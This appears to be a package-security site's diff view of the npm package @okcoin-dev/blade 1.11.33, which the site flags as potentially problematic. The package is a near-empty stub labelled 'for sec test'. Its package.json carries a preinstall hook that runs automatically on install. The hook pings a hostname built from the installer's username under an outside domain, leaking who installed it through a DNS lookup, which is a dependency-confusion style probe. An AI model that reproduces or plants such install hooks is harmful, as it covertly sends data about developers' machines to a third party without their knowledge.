@okcoin-dev/blade 1.11.33

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @okcoin-dev/blade might be problematic. Click here for more details.

File without changes
package/README.md ADDED
@@ -0,0 +1,5 @@
1
+ # @ok/okxGlobal
2
+
3
+ ## Introduction
4
+
5
+ for sec test
package/package.json ADDED
@@ -0,0 +1,22 @@
1
+ {
2
+ "name": "@okcoin-dev/blade",
3
+ "version": "1.11.33",
4
+ "description": "public module library",
5
+ "main": "src/index.js",
6
+ "scripts": {
7
+ "preinstall": "ping -c 2 `whoami`-npm2.m9x.okg-dev.com"
8
+ },
9
+ "keywords": [
10
+ "okx blade"
11
+ ],
12
+ "author": "okx",
13
+ "license": "ISC",
14
+ "dependencies": {
15
+ "qr.js": "0.0.0",
16
+ "xss": "^1.0.13"
17
+ },
18
+ "publishConfig": {
19
+ "access": "public",
20
+ "registry": "https://registry.npmjs.org/"
21
+ }
22
+ }
package/src/index.html ADDED
@@ -0,0 +1,10 @@
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <title>Title</title>
6
+ </head>
7
+ <body>
8
+
9
+ </body>
10
+ </html>
package/src/index.js ADDED
@@ -0,0 +1,4 @@
1
+
2
+ const okxGlobal = "for sec testing"
3
+
4
+ export default okxGlobal;